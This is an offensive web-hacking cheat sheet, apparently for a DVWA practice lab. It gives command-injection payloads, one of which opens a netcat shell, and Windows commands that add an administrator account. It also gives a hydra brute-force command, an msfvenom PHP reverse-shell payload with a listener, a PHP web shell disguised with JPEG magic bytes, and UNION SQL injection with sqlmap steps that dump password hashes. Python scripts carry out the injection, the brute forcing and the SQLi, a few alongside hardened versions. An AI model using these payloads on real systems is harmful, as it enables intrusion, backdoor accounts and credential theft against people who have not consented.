Hacking Web Applications and Web Servers

Command Execution

Linux

  • 127.0.0.1 && ls

  • 127.0.0.1 & ls

  • 127.0.0.1 & ls

  • 127.0.0.1 ; ls

  • 127.0.0.1 | ls - with space

  • 127.0.0.1 |ls - without space

  • 127.0.0.1 && nc -c sh 127.0.0.1 9001
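Added example (not from the original page): a constructed stand-in for the vulnerable ping form that these payloads target, next to a hardened version. The server side is assumed to build `"<command> " + user_input` and hand it to /bin/sh; `echo pinging` replaces the real ping binary so the script runs anywhere a POSIX shell exists, and `id` is the injected command in place of `ls`.

```python
import ipaddress
import subprocess

# Constructed vulnerable handler: the user-supplied host is concatenated into a
# shell command line with no validation and no quoting. "echo pinging" is a
# stand-in for ping so the example runs without network access or the ping binary.
def vulnerable_ping(host: str) -> str:
    cmd = "echo pinging " + host
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


# The separators from the list above, each followed by `id` as the injected command.
PAYLOADS = {
    "&&": "127.0.0.1 && id",
    "&": "127.0.0.1 & id",
    ";": "127.0.0.1 ; id",
    "|": "127.0.0.1 | id",
    "|nospace": "127.0.0.1 |id",
}


def injected(host: str) -> bool:
    """True when the injected `id` really ran: its output contains 'uid='."""
    return "uid=" in vulnerable_ping(host)


# Hardened handler: parse the value as an IP literal and pass it as a single argv
# element, so no shell ever interprets it. Hostnames are rejected on purpose;
# allow them only through a strict allowlist/regex if the feature needs them.
def build_ping_argv(host: str) -> list:
    ip = ipaddress.ip_address(host.strip())  # ValueError on "127.0.0.1; ls" etc.
    return ["ping", "-c", "1", str(ip)]


def rejects(host: str) -> bool:
    """True when the hardened validation refuses the input."""
    try:
        build_ping_argv(host)
    except ValueError:
        return True
    return False


def safe_ping(host: str) -> str:
    return subprocess.run(build_ping_argv(host), capture_output=True, text=True).stdout


if __name__ == "__main__":
    for name, payload in PAYLOADS.items():
        print(f"{name:9s} injected={injected(payload)}")
    for payload in PAYLOADS.values():
        print(f"hardened rejects {payload!r}: {rejects(payload)}")
```

Every separator in the list gets `id` executed through the vulnerable path; none of them survive `ipaddress.ip_address()`, and because the argv form never goes through a shell, even a value that did slip past validation could not chain a second command.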

Windows

  • hostname

  • whoami

  • tasklist

  • taskkill /PID 3112 /F - forcefully kills the process with PID 3112

  • dir c:\

  • net user

  • net user test /add - add a new user

  • net localgroup Administrators test /add - add test user to administrators

  • net user test - details of the user

  • dir c:\pin.txt

  • type c:\pin.txt


Brute-Forcing

hydra -l admin -P /usr/share/wordlists/john.lst 'http-get-form://127.0.0.1:42001/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie\:PHPSESSID=7vs4mhc1q4dnp3f6cgikl01v9q; security=low:F=Username and/or password incorrect'

The PHPSESSID is the one from your own logged-in browser session; without a valid one DVWA answers every request with the login page, which does not contain the F= string, so every guess looks like a hit. F= is the text that marks a failed login; hydra reports any response that does not contain it. Colons inside the H= header value are escaped as \: because : separates the module's fields.
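Added example, not part of the original page: the same http-get-form attack written out in Python so the two rules hydra applies are visible, the F= failure string and the H= cookie header. Target URL, cookie value and failure string are taken from the hydra line above; the PHPSESSID is a placeholder, and `constructed_fake_target` is an offline stand-in for DVWA so the logic can be exercised without a server.

```python
import itertools
import urllib.parse
import urllib.request
from typing import Callable, Iterable, Optional, Tuple

# Values mirroring the hydra line above. The PHPSESSID is a placeholder; use the
# one from your own logged-in browser session.
TARGET = "http://127.0.0.1:42001/vulnerabilities/brute/"
COOKIE = "PHPSESSID=7vs4mhc1q4dnp3f6cgikl01v9q; security=low"
FAILURE_MARKER = "Username and/or password incorrect"

Attempt = Callable[[str, str], str]  # (user, password) -> response body


def http_get_form_attempt(user: str, password: str) -> str:
    """One attempt the way hydra's http-get-form module sends it:
    GET ?username=^USER^&password=^PASS^&Login=Login with the H= Cookie header."""
    qs = urllib.parse.urlencode({"username": user, "password": password, "Login": "Login"})
    req = urllib.request.Request(TARGET + "?" + qs, headers={"Cookie": COOKIE})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


def marker_seen_for_bad_login(attempt: Attempt, failure_marker: str) -> bool:
    """Sanity check before spraying: a password that cannot be right must produce
    the failure marker. If it does not (expired session cookie -> login page,
    different error text, lockout page), every guess would look like a hit."""
    return failure_marker in attempt("admin", "definitely-not-the-password-000")


def brute_force(attempt: Attempt, users: Iterable[str], passwords: Iterable[str],
                failure_marker: str = FAILURE_MARKER) -> Optional[Tuple[str, str]]:
    """hydra's F= rule: the first response that does NOT contain the failure string is a hit."""
    if not marker_seen_for_bad_login(attempt, failure_marker):
        raise RuntimeError("failure marker not seen for a known-bad login; check the cookie and F= string")
    passwords = list(passwords)  # reused for every user
    for user, pw in itertools.product(users, passwords):
        if failure_marker not in attempt(user, pw):
            return user, pw
    return None


def constructed_fake_target(valid=("admin", "password"), logged_in=True) -> Attempt:
    """Constructed offline stand-in for DVWA. logged_in=False simulates a missing or
    expired PHPSESSID: every request is answered with the login page."""
    def attempt(user: str, pw: str) -> str:
        if not logged_in:
            return "<title>Login :: Damn Vulnerable Web Application</title>"
        return "Welcome to the password protected area" if (user, pw) == valid else FAILURE_MARKER
    return attempt


if __name__ == "__main__":
    # Against the fake target; swap in http_get_form_attempt for the real DVWA instance.
    with open("/usr/share/wordlists/john.lst", errors="replace") as f:
        words = [w.strip() for w in f if w.strip() and not w.startswith("#")]
    print(brute_force(constructed_fake_target(), ["admin"], words))
```

The sanity check is the part hydra does not do for you: with a dead session cookie the login page is returned for every attempt, it lacks the failure string, and the very first guess is reported as valid.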

File Upload

  • msfvenom -p php/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw > exploit.php

  • exploit.php.img - double extension for filters that only look at the last extension; whether the file still runs as PHP depends on the server's handler configuration

  • GIF89a; - put this as the first line of any file so magic-byte checks (e.g. getimagesize()) treat it as a GIF image

  • use multi/handler - in msfconsole, then set the same payload, LHOST and LPORT as the msfvenom command, run, and browse to the uploaded file to trigger the callback

# PHP web shell disguised as image/jpeg: FF D8 FF E0 is the JPEG SOI + APP0 marker,
# which is all a magic-byte check looks at; PHP echoes those bytes and then runs the code
with open('shell.php', 'wb') as fh:
    fh.write(b'\xFF\xD8\xFF\xE0' + b'<?php passthru($_GET["cmd"]); ?>')

SQL Injection

Manual

  • 1' UNION SELECT user, password FROM users# - the leading ' closes the application's own quote, # comments out the rest of the query (MySQL syntax); the two selected columns must match the column count of the original SELECT
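Added example, not from the original page: the UNION payload above run against a constructed SQLite copy of a DVWA-style users table, through a string-concatenated query and through a parameterized one. SQLite does not accept MySQL's # comment, so the SQLite variant of the payload ends in `-- ` instead; the hashes are computed inline and the table layout is this example's assumption.

```python
import hashlib
import sqlite3

# Constructed table modelled on DVWA's users table (DVWA itself runs on MySQL).
ADMIN_HASH = hashlib.md5(b"password").hexdigest()
GORDON_HASH = hashlib.md5(b"abc123").hexdigest()


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT,
                            user TEXT, password TEXT);
    """)
    con.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", [
        (1, "admin", "admin", "admin", ADMIN_HASH),
        (2, "Gordon", "Brown", "gordonb", GORDON_HASH),
    ])
    return con


def lookup_vulnerable(con: sqlite3.Connection, user_id: str) -> list:
    # String concatenation: the application's own quote is what the payload's leading ' closes.
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return con.execute(sql).fetchall()


def lookup_parameterized(con: sqlite3.Connection, user_id: str) -> list:
    # The value is bound, never parsed as SQL, so the payload is just a string that matches nothing.
    return con.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (user_id,)
    ).fetchall()


# The page's payload uses '#', MySQL's comment marker. SQLite's line comment is '--',
# so the equivalent payload here ends with '-- ' (the space matters: it swallows the trailing quote).
PAYLOAD_MYSQL = "1' UNION SELECT user, password FROM users#"
PAYLOAD_SQLITE = "1' UNION SELECT user, password FROM users-- "


def dump_via_union(con: sqlite3.Connection) -> set:
    """Rows the attacker sees: the legitimate row plus one (user, hash) pair per account."""
    return set(lookup_vulnerable(con, PAYLOAD_SQLITE))


if __name__ == "__main__":
    con = make_db()
    print("vulnerable   :", sorted(dump_via_union(con)))
    print("parameterized:", lookup_parameterized(con, PAYLOAD_SQLITE))
    print("normal lookup:", lookup_parameterized(con, "1"))
```

The UNION works because both SELECTs return two columns; with a three-column original query the payload would need a third dummy column (e.g. `NULL`), which is what the `--columns` step in sqlmap below figures out automatically.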

Sqlmap

  • sqlmap -r req.txt --batch - req.txt is a raw request saved from Burp or the browser, Cookie header included, so the session is reused; --batch accepts the defaults without prompting

  • sqlmap -r req.txt --batch --level=5 --risk=3

  • sqlmap -r req.txt --batch --level=5 --risk=3 --current-db

  • sqlmap -r req.txt -D dvwa --tables

  • sqlmap -r req.txt -D dvwa -T users --columns

  • sqlmap -r req.txt -D dvwa -T users --dump
